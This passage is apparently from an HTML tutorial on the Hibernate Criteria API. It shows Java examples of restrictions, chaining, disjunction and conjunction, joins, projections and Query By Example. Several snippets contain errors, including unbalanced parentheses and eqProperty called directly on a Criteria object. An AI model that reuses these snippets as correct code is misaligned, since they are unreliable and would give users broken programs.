<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">like</span><span class="op">(</span><span class="st">"insuranceName"</span><span class="op">,</span> <span class="st">"%a%"</span><span class="op">));</span> </span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">between</span><span class="op">(</span><span class="st">"investAmount"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1000</span><span class="op">),</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2500</span><span class="op">)));</span> </span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">setMaxResults</span><span class="op">(</span><span class="dv">5</span><span class="op">);</span> </span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="bu">List</span> insurances <span class="op">=</span> crit<span class="op">.</span><span class="fu">list</span><span class="op">();</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a><span class="cf">for</span><span class="op">(</span><span class="bu">Iterator</span> it <span class="op">=</span>insurances<span class="op">.</span><span class="fu">iterator</span><span class="op">();</span>it<span class="op">.</span><span class="fu">hasNext</span><span class="op">();){</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> Insurance insurance <span class="op">=</span> <span class="op">(</span>Insurance<span class="op">)</span> it<span class="op">.</span><span class="fu">next</span><span class="op">();</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"ID: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getLngInsuranceId</span><span class="op">());</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Name: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getInsuranceName</span><span class="op">());</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"Amount: "</span> <span class="op">+</span> insurance<span class="op">.</span><span class="fu">getInvestAmount</span><span class="op">());</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<h3 id="criterion-chaining">Criterion Chaining</h3>
<p>This is a popular method of adding Restrictions, Expressions,
Projections and Order object without the need to create additional
Objects. This is particularly useful when the Criteria Objects which are
extensible are needed to be passed between methods.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="bu">List</span> sales <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">ge</span><span class="op">(</span><span class="st">"date"</span><span class="op">,</span>startDate<span class="op">)</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">le</span><span class="op">(</span><span class="st">"date"</span><span class="op">,</span>endDate<span class="op">)</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">asc</span><span class="op">(</span><span class="st">"date"</span><span class="op">)</span> <span class="op">)</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFirstResult</span><span class="op">(</span><span class="dv">0</span><span class="op">)</span></span>
<span id="cb5-6"><a aria-hidden="true" href="#cb5-6" tabindex="-1"></a> <span class="op">.</span><span class="fu">setMaxResults</span><span class="op">(</span><span class="dv">10</span><span class="op">)</span></span>
<span id="cb5-7"><a aria-hidden="true" href="#cb5-7" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<h3 id="restriction-for-where-property">Restriction for WHERE
property</h3>
<p>The WHERE clause or <em>Restrictions</em> can be easily applied via
<code>Restriction.eqProperty()</code>,
<code>Restriction.neProperty()</code>,
<code>Restriction.leProperty()</code> and
<code>Restriction.geProperty()</code></p>
<div class="sourceCode" id="cb6"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><span class="co">// Adds a WHERE Clause for comparing two columns,</span></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">eqProperty</span><span class="op">(</span><span class="st">"saleDate"</span><span class="op">,</span><span class="st">"releaseDate"</span><span class="op">)</span></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>Restriction still allows custom restrictions added using
<code>Restrictions.sqlRestriction</code></p>
<div class="sourceCode" id="cb7"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="co">// Adds a native SQL Restriction in the WHERE Clause</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a><span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">sqlRestriction</span><span class="op">(</span><span class="st">"lower({alias}.name) like lower(?)"</span><span class="op">,</span> <span class="st">"Fritz%"</span><span class="op">,</span>Hibernate<span class="op">.</span><span class="fu">STRING</span><span class="op">)</span> <span class="op">)</span> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p><em>All the static methods available in Restrictions are also
available in the Expression API. Also it contains some additional
methods such as ilike(“columnname”) which does a lower(columnname) in
the query.</em></p>
<h3 id="disjunction-and-conjunction">Disjunction and Conjunction:</h3>
<p>Disjunction and Conjunction are excellent APIs which help perform
complex search criteria simple to develop and maintain.</p>
<p><strong>Disjunction</strong> indicates a group of Criterion to be
<strong>ORed</strong></p>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a>Disjunction disList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">disjunction</span><span class="op">();</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a>disList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">));</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a>disList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2</span><span class="op">));</span></span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>disList<span class="op">);</span></span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a><span class="co">// This gives the WHERE Clause WHERE (id=1 OR id=2)</span></span></code></pre></div>
<p><strong>Conjunction</strong> indicates a group of Critierion to be
<strong>ANDed</strong></p>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a>Conjunction conList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">conjunction</span><span class="op">();</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">));</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">2</span><span class="op">));</span></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a>sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>conList<span class="op">);</span></span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a><span class="co">// This gives the WHERE Clause WHERE (id=1 AND id=2)</span></span></code></pre></div>
<p>_The Disjunctions and Conjunctions can be nested as well and also
along with group of Restrictions.</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a>Conjunction conList <span class="op">=</span> Restrictions<span class="op">.</span><span class="fu">conjunction</span><span class="op">();</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a>conList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">disjunction</span><span class="op">()</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"id"</span><span class="op">,</span><span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">1</span><span class="op">))));</span></span></code></pre></div>
<h3 id="how-to-join-tables-using-criteria-api">How to join Tables using
Criteria API</h3>
<p>Using HQLs, joins resemble SQL closely. [source,sql]</p>
<pre><code>// use LEFT JOIN FETCH for optimizing queries
from Sale sale where sale.date > :startDate left join fetch sale.product</code></pre>
<p>The same can be achieved using Criteria API with the help of
<code>setFetchMode()</code></p>
<div class="sourceCode" id="cb12"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFetchMode</span><span class="op">(</span><span class="st">"product"</span><span class="op">,</span>FetchMode<span class="op">.</span><span class="fu">EAGER</span><span class="op">)</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">setFetchMode</span><span class="op">(</span><span class="st">"category"</span><span class="op">,</span>FetchMode<span class="op">.</span><span class="fu">EAGER</span><span class="op">)</span></span>
<span id="cb12-4"><a aria-hidden="true" href="#cb12-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>Using Criteria API, even <strong>Restriction</strong> can be applied
on the joined tables.Criteria API uses the createCriteria() or
createAlias() (no new instance) to create an inner join between the two
tables.</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a><span class="co">// to find all the shirt models with sizes over 40.</span></span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a><span class="co">// HQL: from Shirt shirt join shirt.availableSizes size where size.number > 40</span></span>
<span id="cb13-3"><a aria-hidden="true" href="#cb13-3" tabindex="-1"></a></span>
<span id="cb13-4"><a aria-hidden="true" href="#cb13-4" tabindex="-1"></a>Session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Shirt<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb13-5"><a aria-hidden="true" href="#cb13-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span><span class="st">"availableSizes"</span><span class="op">)</span></span>
<span id="cb13-6"><a aria-hidden="true" href="#cb13-6" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"number"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">40</span><span class="op">)))</span></span>
<span id="cb13-7"><a aria-hidden="true" href="#cb13-7" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<h3 id="projections---aggregation-and-grouping">Projections -
Aggregation and Grouping</h3>
<p>The Projections API is used for aggregation and grouping
functionality. A simple example which returns the count of number of
cats with age greater than 10.</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb14-1"><a aria-hidden="true" href="#cb14-1" tabindex="-1"></a><span class="co">// Simple Projection</span></span>
<span id="cb14-2"><a aria-hidden="true" href="#cb14-2" tabindex="-1"></a>session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb14-3"><a aria-hidden="true" href="#cb14-3" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"age"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">10</span><span class="op">))</span></span>
<span id="cb14-4"><a aria-hidden="true" href="#cb14-4" tabindex="-1"></a> <span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">rowCount</span><span class="op">())</span></span>
<span id="cb14-5"><a aria-hidden="true" href="#cb14-5" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>A number of aggregations can be done in a single Criteria and can be
done along with a group by clause.</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Cat<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb15-2"><a aria-hidden="true" href="#cb15-2" tabindex="-1"></a>ProjectionList projList <span class="op">=</span> Projections<span class="op">.</span><span class="fu">projectionList</span><span class="op">();</span></span>
<span id="cb15-3"><a aria-hidden="true" href="#cb15-3" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">rowCount</span><span class="op">()</span> <span class="op">);</span></span>
<span id="cb15-4"><a aria-hidden="true" href="#cb15-4" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">avg</span><span class="op">(</span><span class="st">"weight"</span><span class="op">)</span> <span class="op">)</span> <span class="op">;</span></span>
<span id="cb15-5"><a aria-hidden="true" href="#cb15-5" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">max</span><span class="op">(</span><span class="st">"weight"</span><span class="op">)</span> <span class="op">)</span> <span class="op">;</span></span>
<span id="cb15-6"><a aria-hidden="true" href="#cb15-6" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">groupProperty</span><span class="op">(</span><span class="st">"color"</span><span class="op">)</span> <span class="op">)</span> ) <span class="op">;</span></span>
<span id="cb15-7"><a aria-hidden="true" href="#cb15-7" tabindex="-1"></a><span class="bu">List</span> result <span class="op">=</span> crit<span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>projList<span class="op">).</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>To allow the users to query only the required columns Hibernate 3
introduced the <strong>Projections.property()</strong></p>
<div class="sourceCode" id="cb16"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Employee<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb16-2"><a aria-hidden="true" href="#cb16-2" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">eq</span><span class="op">(</span><span class="st">"zipCode"</span><span class="op">,</span> zipCode<span class="op">));</span></span>
<span id="cb16-3"><a aria-hidden="true" href="#cb16-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">gt</span><span class="op">(</span><span class="st">"salary"</span><span class="op">,</span> <span class="kw">new</span> <span class="bu">Integer</span><span class="op">(</span><span class="dv">10000</span><span class="op">));</span></span>
<span id="cb16-4"><a aria-hidden="true" href="#cb16-4" tabindex="-1"></a>ProjectionList projList <span class="op">=</span> Projections<span class="op">.</span><span class="fu">projectionList</span><span class="op">();</span></span>
<span id="cb16-5"><a aria-hidden="true" href="#cb16-5" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"name"</span><span class="op">));</span></span>
<span id="cb16-6"><a aria-hidden="true" href="#cb16-6" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"age"</span><span class="op">));</span></span>
<span id="cb16-7"><a aria-hidden="true" href="#cb16-7" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"county"</span><span class="op">));</span></span>
<span id="cb16-8"><a aria-hidden="true" href="#cb16-8" tabindex="-1"></a>projList<span class="op">.</span><span class="fu">add</span><span class="op">(</span>Projections<span class="op">.</span><span class="fu">property</span><span class="op">(</span><span class="st">"job"</span><span class="op">));</span></span>
<span id="cb16-9"><a aria-hidden="true" href="#cb16-9" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">setProjection</span><span class="op">(</span>projList<span class="op">);</span></span></code></pre></div>
<p><em>This really helps when the table being queried contains 50 to 60
columns and we need only 4 to 5 columns.</em></p>
<h3 id="query-by-example-api">Query By Example API</h3>
<p>The Example API helps to optimize the query by initializing the text
values and by providing extensibility of the Criterion Object.</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a><span class="co">// Initializing the text values to be used</span></span>
<span id="cb17-2"><a aria-hidden="true" href="#cb17-2" tabindex="-1"></a>Accommodation accommodationEx <span class="op">=</span> <span class="kw">new</span> <span class="fu">Accommodation</span><span class="op">();</span></span>
<span id="cb17-3"><a aria-hidden="true" href="#cb17-3" tabindex="-1"></a>accommodationEx<span class="op">.</span><span class="fu">setCountry</span><span class="op">(</span>country<span class="op">);</span> </span>
<span id="cb17-4"><a aria-hidden="true" href="#cb17-4" tabindex="-1"></a>accommodationEx<span class="op">.</span><span class="fu">setCapacity</span><span class="op">(</span>capacity<span class="op">);</span></span>
<span id="cb17-5"><a aria-hidden="true" href="#cb17-5" tabindex="-1"></a></span>
<span id="cb17-6"><a aria-hidden="true" href="#cb17-6" tabindex="-1"></a><span class="co">// Creating and fine tuning the example object</span></span>
<span id="cb17-7"><a aria-hidden="true" href="#cb17-7" tabindex="-1"></a>Example example <span class="op">=</span> Example<span class="op">.</span><span class="fu">create</span><span class="op">(</span>accommodationEx<span class="op">)</span></span>
<span id="cb17-8"><a aria-hidden="true" href="#cb17-8" tabindex="-1"></a> <span class="op">.</span><span class="fu">ignoreCase</span><span class="op">()</span> <span class="co">//Queries are case insensitive</span></span>
<span id="cb17-9"><a aria-hidden="true" href="#cb17-9" tabindex="-1"></a> <span class="op">.</span><span class="fu">excludeZeroes</span><span class="op">()</span> <span class="co">//zero-valued fields are ignored</span></span>
<span id="cb17-10"><a aria-hidden="true" href="#cb17-10" tabindex="-1"></a> <span class="op">.</span><span class="fu">excludeProperty</span><span class="op">(</span><span class="st">"doNotUse"</span><span class="op">)</span> <span class="co">// this property is excluded</span></span>
<span id="cb17-11"><a aria-hidden="true" href="#cb17-11" tabindex="-1"></a> <span class="op">.</span><span class="fu">enableLike</span><span class="op">(</span>MatchMode<span class="op">.</span><span class="fu">ANYWHERE</span><span class="op">);</span> <span class="co">//query string matching uses ‘%X%’</span></span>
<span id="cb17-12"><a aria-hidden="true" href="#cb17-12" tabindex="-1"></a></span>
<span id="cb17-13"><a aria-hidden="true" href="#cb17-13" tabindex="-1"></a><span class="co">// Using the Example Object and adding further restrictions</span></span>
<span id="cb17-14"><a aria-hidden="true" href="#cb17-14" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Accommodation<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb17-15"><a aria-hidden="true" href="#cb17-15" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span>example<span class="op">)</span></span>
<span id="cb17-16"><a aria-hidden="true" href="#cb17-16" tabindex="-1"></a> <span class="op">.</span><span class="fu">add</span><span class="op">(</span><span class="bu">Expression</span><span class="op">.</span><span class="fu">between</span><span class="op">(</span><span class="st">"availabilityDate"</span><span class="op">,</span> startDate<span class="op">,</span> endDate<span class="op">))</span></span>
<span id="cb17-17"><a aria-hidden="true" href="#cb17-17" tabindex="-1"></a> <span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>